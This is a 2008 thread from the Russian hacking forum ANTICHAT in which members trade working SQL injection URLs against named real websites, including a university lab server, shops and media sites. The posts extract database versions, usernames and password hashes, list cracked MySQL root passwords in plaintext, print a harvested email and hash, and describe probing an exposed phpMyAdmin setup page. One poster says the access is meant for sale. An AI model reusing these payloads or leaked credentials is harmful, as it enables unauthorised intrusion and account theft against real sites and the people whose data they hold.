HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.06.2008, 03:18
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Comingsoon.net
Цитата:
http://www.comingsoon.net/films.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())--
вывод в <meta name="DESCRIPTION" content="4.1.22:comingso_nextra:comingso_nextra@cs n-node1-int">

Aen.ru
Цитата:
http://www.aen.ru/?page=article&category=politics&article_id=-1+union+select+1,aes_decrypt(aes_encrypt(version() ,0x71),0x71),3,4,5,6,7/*
Bmoca.org
Цитата:
http://www.bmoca.org/artist.php?id=1+UNION+SELECT+1,username,3,4,passwo rd,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25+from+users--
Eicta.org
Цитата:
http://www.eicta.org/index.php?id=32&id_article=-1+union+select+unhex(hex(version())),2,3,4,5,6,7,8 ,9,10,11,12--
Bti.cornell.edu - Еда
Цитата:
http://bti.cornell.edu/pgrp/pgrp.php?id=201'
Freedocumentaries.org
Цитата:
http://freedocumentaries.org/film.php?id=-1+union+select+1/*
подбор?

Umpcportal.com
Цитата:
http://www.umpcportal.com/products/product.php?id=1'
скуль?

Последний раз редактировалось sabe; 15.06.2008 в 12:44..
 
Ответить с цитированием

  #2  
Старый 15.06.2008, 06:06
lastsmile
Познающий
Регистрация: 22.09.2007
Сообщений: 42
С нами: 9808570

Репутация: 22
По умолчанию

небольшой магазин
http://www.landmetzgerei.at/

http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,3,4,5,6,7,8,9/*

а вот если user() или version() пытаюсь подставлять, то сервак ругается =( думаю можно было пробовать криптовать, но сейчас уже глаза слипаются чтоб с ним воевать если кому-то интересно можете добить
 
Ответить с цитированием

  #3  
Старый 15.06.2008, 08:20
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами: 9456679

Репутация: 97
По умолчанию

Лови:
http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,convert(concat_ws(0x3A3a,versio n(),user(),database())+using+latin1),4,5,6,7,8,9/*
Таблицы не подбирал, это уж сам давай.
_____________________________

Цель - media.mit.edu, пр8, начал копать

Цитата:
http://affect.media.mit.edu/projects.php?id=-1935+union+select+1,2,3,concat_ws(0x3A3a,user,pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23+from+mysql.user/*
таблицы не подобрал.
Хеши которые сбрутились:
Цитата:
Quote:root::1c3b7f0b58c961df :: DufwtDB!
antigroupware::3f6686f4521deef9 :: wonderful
rcaneel::0d90c1511e59b951 :: failsafe
остальные в очереди.

На madnet.name/tools/madss/ пробил по ReverseIp, сайтов там на серваке стопицотсотинтыщь.

Куда с этим рутом коннектицца я х.з. phpmyadmin нужный не нашёл, накопал lyme.media.mit.edu/pmadmin/ ,там авторизация, пассы канешн неподходят.
Лезу _http://lyme.media.mit.edu/pmadmin/scripts/setup.php пустило, права видать криво стоят;
lyme.media.mit.edu/pmadmin/scripts/ просматриваем файло.Версия phpMyAdmin 2.11.2, уже с**** третяя за 3 дня.

Раскрытие путей-/var/www/cerebro.old/includes/, толку 0.

Этот грёбанный поддомен в списке сайтов от целевого на серваке не присутствует, он и под другим ip.
Куда вобщем с этим рутом лезть я не знаю.Делаю вывод, что раз media.mit.edu -- affect.media.mit.edu на одном серваке, значит рут (полученные пасс\логин) целевой. Но найти зацепку к коннекту немогу.
phpMyAdmin from lyme.media.mit.edu вообще фэйк какой то.Всё ужасно криво. Если кто что накопает, обьявите плз. Уже чисто ради интереса.

Последний раз редактировалось Imperou$; 15.06.2008 в 08:28..
 
Ответить с цитированием

  #4  
Старый 15.06.2008, 09:10
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

если есть доступ к mysql.user.. как нащет file_priv?
сервак affect.media.mit.edu и mit.edu - разные айпишки... хотя универ один и тот же. наверника не один сервак у них и все запутано для безопасности.
mit.edu/admin - раскрытие путей.. (кое каких)
ты спрашивал про админку. думаю на этом сайте все держится.. кста как у всех универах должна быть система онлайн доступа к курсам и тд...
это большой универ и вобщем очень хороший. если б раскрутить, нас бы в новостях показали..))

Последний раз редактировалось sabe; 15.06.2008 в 09:25..
 
Ответить с цитированием

  #5  
Старый 15.06.2008, 09:33
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

http://www.rosana.de

Код:
http://www.rosana.de/main.asp?main=-1'+union+select+1,concat_ws(0x3a,user,password),3,4,5,6+from+mysql.user/*
http://www.alpinestars.se

Код:
http://www.alpinestars.se/MainVisaUnderBild.asp?nid=1+or+1=(SELECT+TOP+1+cast(user+as+nvarchar)%2Bchar(58)%2Bcast(pwd+as+nvarchar)+FROM+users)--
 
Ответить с цитированием

  #6  
Старый 15.06.2008, 12:04
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Polemika.com.ua
Цитата:
http://polemika.com.ua/index.php?action=image&image_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,password,email)+from+user+where+id=2--
вывод в txt файл..)

Последний раз редактировалось sabe; 15.06.2008 в 12:16..
 
Ответить с цитированием

  #7  
Старый 15.06.2008, 12:13
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
С нами: 9499716

Репутация: 135
По умолчанию

да скуль
_http://www.bmoca.org/artist.php?id=1+UNION+SELECT+1,user(),3,4,version( ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25--
 
Ответить с цитированием

  #8  
Старый 15.06.2008, 13:47
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

http://bootsus.bri-global.com/
Код:
http://bootsus.bri-global.com/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(admin_username+as+nvarchar)%2Bchar(58)%2Bcast(admin_password+as+nvarchar)+FROM+admin_users)--&sid=1&iid=198
http://www.theovalgroup.com/
Код:
http://www.theovalgroup.com/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(usrUsername+as+nvarchar)%2Bchar(58)%2Bcast(usrPassword+as+nvarchar)+FROM+smtblUser)--&sid=2477&pid=35763
http://www.davy.co.uk/
Код:
http://www.davy.co.uk/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(usrUsername+as+nvarchar)%2Bchar(58)%2Bcast(usrPassword+as+nvarchar)+FROM+smtblUser)--&sid=179&pid=43144
 
Ответить с цитированием

  #9  
Старый 15.06.2008, 15:37
Toxic
Новичок
Регистрация: 12.01.2008
Сообщений: 8
С нами: 9646865

Репутация: 25
По умолчанию

http://f1dvd.ru/index.php?p=gallerypic&img_id=-519+union+select+1,2,3,concat_ws(char(124),email,p ass),5,6,7,8,9+from+kpro6_user+limit+0,1--&galid=45&area=1&ascdesc=desc&print=1

babara@mail.ru|563f311d2613a827c2d3897a024ddf74
51654

Любителям формулы 1 ))
 
Ответить с цитированием

  #10  
Старый 15.06.2008, 15:54
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами: 9456679

Репутация: 97
По умолчанию

2 sabe
Пробей, file_priv как видишь нет, я б отписал. От админки без пассов толку нет, рута ведь туда не втулишь, я видел её. И про админку я спрашивал не на этом сайте Тот линк я к сожалению выложить не могу, слишком дорого мне выйдет.
Рут то на media.mit.edu по идее, т.к. media.mit.edu
и mit.edu на разных серваках и ипах,соответсвенно affect.media.mit.edu откуда стянули рута, это поддомен корня media.mit.edu на этом серваке, и рут по идее должен быть к нему, а не к mit.edu, сервы то разные... Но про это я писал выше, подразумевая целевой рут.
Да в принципе я и ломал не для новостей, а сеошникам\скупщикам загнать как еду пиаристую. Как видишь всё корыстно .
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.